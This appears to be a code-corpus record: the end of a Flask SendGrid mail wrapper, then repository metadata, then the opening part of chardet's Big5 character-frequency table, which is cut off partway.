default_sender, debug, suppress,
ascii_attachments=False):
self.api_key = api_key
self.default_sender = default_sender
self.debug = debug
self.suppress = suppress
self.ascii_attachments = ascii_attachments
class Mail(_MailMixin):
def __init__(self, app=None):
self.app = app
if app is not None:
self.state = self.init_app(app)
else:
self.state = None
def init_mail(self, config, debug=False, testing=False):
return _Mail(
config.get('SENDGRID_API_KEY'),
config.get('MAIL_DEFAULT_SENDER'),
int(config.get('MAIL_DEBUG', debug)),
config.get('MAIL_SUPPRESS_SEND', testing),
config.get('MAIL_ASCII_ATTACHMENTS', False)
)
def init_app(self, app):
state = self.init_mail(app.config, app.debug, app.testing)
app.extensions = getattr(app, 'extensions', {})
app.extensions['mail'] = state
return state
def __getattr__(self, name):
return getattr(self.state, name, None)
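# A minimal usage sketch (assumptions: a Flask app object ``app`` whose config
# sets SENDGRID_API_KEY and MAIL_DEFAULT_SENDER; the names below are
# illustrative only):
#
#     mail = Mail(app)
#     msg = Message(subject="Hello", recipients=["user@example.com"], body="Hi")
#     mail.send(msg)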
| 37.389313
| 128
| 0.629645
|
4a143e9e1039fe36e14f7f84d19cc6e0ea69f733
| 30,537
|
py
|
Python
|
darling_ansible/python_venv/lib/python3.7/site-packages/oci/_vendor/chardet/big5freq.py
|
revnav/sandbox
|
f9c8422233d093b76821686b6c249417502cf61d
|
[
"Apache-2.0"
] | null | null | null |
darling_ansible/python_venv/lib/python3.7/site-packages/oci/_vendor/chardet/big5freq.py
|
revnav/sandbox
|
f9c8422233d093b76821686b6c249417502cf61d
|
[
"Apache-2.0"
] | null | null | null |
darling_ansible/python_venv/lib/python3.7/site-packages/oci/_vendor/chardet/big5freq.py
|
revnav/sandbox
|
f9c8422233d093b76821686b6c249417502cf61d
|
[
"Apache-2.0"
] | 1
|
2020-06-25T03:12:58.000Z
|
2020-06-25T03:12:58.000Z
|
# coding: utf-8
# Modified Work: Copyright (c) 2018, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
# Original Work: Copyright (c) 2018 Character Encoding Detector contributors. https://github.com/chardet
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) = 2.98
# Random Distribution Ratio = 512/(5401-512) = 0.105
#
# The typical distribution ratio is about 25% of the ideal one, still much
# higher than the random distribution ratio (RDR)
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
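# (0.75 is roughly 25% of the ideal ratio 2.98 quoted above.)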
# Char to FreqOrder table
BIG5_TABLE_SIZE = 5376
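# The table maps a character's order to its frequency rank; ranks below 512
# are the ones the distribution analyser counts as "frequent" (512 being the
# point where coverage reaches ~74.851%, per the notes above).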
BIG5_CHAR_TO_FREQ_ORDER = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
63,5010,5011, 317,1614, 75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, # 64
3682, 3, 10,3973,1471, 29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, # 80
4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947, 34,3556,3204, 64, 604, # 96
5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337, 72, 406,5017, 80, # 112
630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449, 69,2987, 591, # 128
179,2096, 471, 115,2035,1844, 60, 50,2988, 134, 806,1869, 734,2036,3454, 180, # 144
995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, # 160
2502, 90,2716,1338, 663, 11, 906,1099,2553, 20,2441, 182, 532,1716,5019, 732, # 176
1376,4204,1311,1420,3206, 25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, # 192
3276, 475,1447,3683,5020, 117, 21, 656, 810,1297,2300,2334,3557,5021, 126,4205, # 208
706, 456, 150, 613,4513, 71,1118,2037,4206, 145,3092, 85, 835, 486,2115,1246, # 224
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, # 240
3558,3135,5023,1956,1153,4207, 83, 296,1199,3093, 192, 624, 93,5024, 822,1898, # 256
2823,3136, 795,2065, 991,1554,1542,1592, 27, 43,2867, 859, 139,1456, 860,4514, # 272
437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, # 288
3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, # 304
1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, # 320
5026,5027,2176,3207,3685,2682, 593, 845,1062,3277, 88,1723,2038,3978,1951, 212, # 336
266, 152, 149, 468,1899,4208,4516, 77, 187,5028,3038, 37, 5,2990,5029,3979, # 352
5030,5031, 39,2524,4517,2908,3208,2079, 55, 148, 74,4518, 545, 483,1474,1029, # 368
1665, 217,1870,1531,3138,1104,2655,4209, 24, 172,3562, 900,3980,3563,3564,4519, # 384
32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683, 4,3039,3351,1427,1789, # 400
188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, # 416
3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439, 38,5037,1063,5038, 794, # 432
3982,1435,2301, 46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804, 35, 707, # 448
324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, # 464
2129,1363,3689,1423, 697, 100,3094, 48, 70,1231, 495,3139,2196,5043,1294,5044, # 480
2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, # 496
314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, # 512
287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, # 528
3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, # 544
1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, # 560
1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, # 576
1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381, 7, # 592
2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, # 608
265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, # 624
4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, # 640
1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, # 656
5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, # 672
2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, # 688
383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, # 704
98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, # 720
523,2789,2790,2658,5061, 141,2235,1333, 68, 176, 441, 876, 907,4220, 603,2602, # 736
710, 171,3464, 404, 549, 18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, # 752
5063,2991, 368,5064, 146, 366, 99, 871,3693,1543, 748, 807,1586,1185, 22,2263, # 768
379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, # 784
1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068, 59,5069, # 800
585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, # 816
690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, # 832
5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, # 848
1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, # 864
544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, # 880
3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, # 896
4224, 57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, # 912
3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, # 928
279,3145, 51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, # 944
610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, # 960
1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, # 976
4227,2475,1436, 953,4228,2055,4545, 671,2400, 79,4229,2446,3285, 608, 567,2689, # 992
3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008
3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024
2402,5097,5098,5099,4232,3045, 0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040
5101, 233,4233,3697,1819,4550,4551,5102, 96,1777,1315,2083,5103, 257,5104,1810, # 1056
3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072
5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088
1484,5110,1712, 127, 67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104
2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120
1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136
78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152
1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168
4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184
3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200
534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216
165, 243,4559,3703,2528, 123, 683,4239, 764,4560, 36,3998,1793, 589,2916, 816, # 1232
626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248
2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264
5122, 611,1156, 854,2386,1316,2875, 2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280
1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296
2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312
1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328
1994,5135,4564,5136,5137,2198, 13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344
5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360
5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376
5149, 128,2133, 92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392
3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408
4567,2252, 94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424
4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440
2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456
5163,2337,2068, 23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472
3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488
598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504
5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863, 41, # 1520
5170,5171,4575,5172,1657,2338, 19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536
1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552
2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568
3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584
4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600
5182,2692, 733, 40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616
3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632
4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648
1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664
1871,2762,3004,5187, 435,5188, 343,1108, 596, 17,1751,4579,2239,3477,3709,5189, # 1680
4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696
1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712
240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728
1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744
1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760
3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776
619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792
5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808
2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824
1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840
1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551, 30,2268,4266, # 1856
5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872
829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888
4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904
375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920
2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936
444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952
1041,3005, 293,1168, 87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968
1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984
730,1515, 184,2840, 66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000
4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016
4021,5231,5232,1186, 15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032
1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048
3596,1342,1681,1718, 766,3297, 286, 89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064
5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080
5240,3298, 310, 313,3482,2304, 770,4278, 54,3054, 189,4611,3105,3848,4025,5241, # 2096
1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112
2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128
1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144
3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160
2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176
3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192
2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208
4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224
4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240
3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256
97, 81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272
3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288
424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304
3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320
4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336
3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352
1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368
5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384
199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400
5286, 587, 14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416
1702,1226, 102,1547, 62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432
391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448
4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294, 86,1494,1730, # 2464
4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480
397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496
2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512
2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885, 28,2695, # 2528
3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544
1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560
4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576
2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592
1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608
1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624
2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640
3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656
1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672
5313,3493,5314,5315,5316,3310,2698,1433,3311, 131, 95,1504,4049, 723,4303,3166, # 2688
1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704
4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654, 53,5320,3014,5321, # 2720
1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736
135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752
1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768
4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784
4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800
2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816
1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832
4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848
660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864
5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880
2322,3316,5346,5347,4308,5348,4309, 84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896
3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912
4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928
790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944
5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960
5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976
1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992
4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008
4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024
2699,1516,3614,1121,1082,1329,3317,4073,1449,3873, 65,1128,2848,2927,2769,1590, # 3040
3874,5370,5371, 12,2668, 45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056
3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072
2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088
1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104
4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120
3736,1859, 91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136
3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152
2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168
4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771, 61,4079,3738,1823,4080, # 3184
5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200
3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216
2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232
3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248
1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264
2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280
3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296
4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063, 56,1396,3113, # 3312
2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328
2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344
5418,1076, 49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360
1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376
2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392
1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408
3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424
4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629, 31,2851, # 3440
2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456
3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472
3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488
2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504
4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520
2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536
3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552
4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568
5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584
3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600
194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616
1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412, 42,3119, 464,5455,2642, # 3632
4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648
1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664
4701,5462,3020, 962, 588,3629, 289,3250,2644,1116, 52,5463,3067,1797,5464,5465, # 3680
5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696
510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712
5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728
5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744
2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760
3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776
2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792
2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808
681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824
1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840
4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856
3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872
3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888
838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904
2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920
625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936
2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952
4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968
1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984
4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000
1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016
3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032
574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048
3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064
5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080
5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096
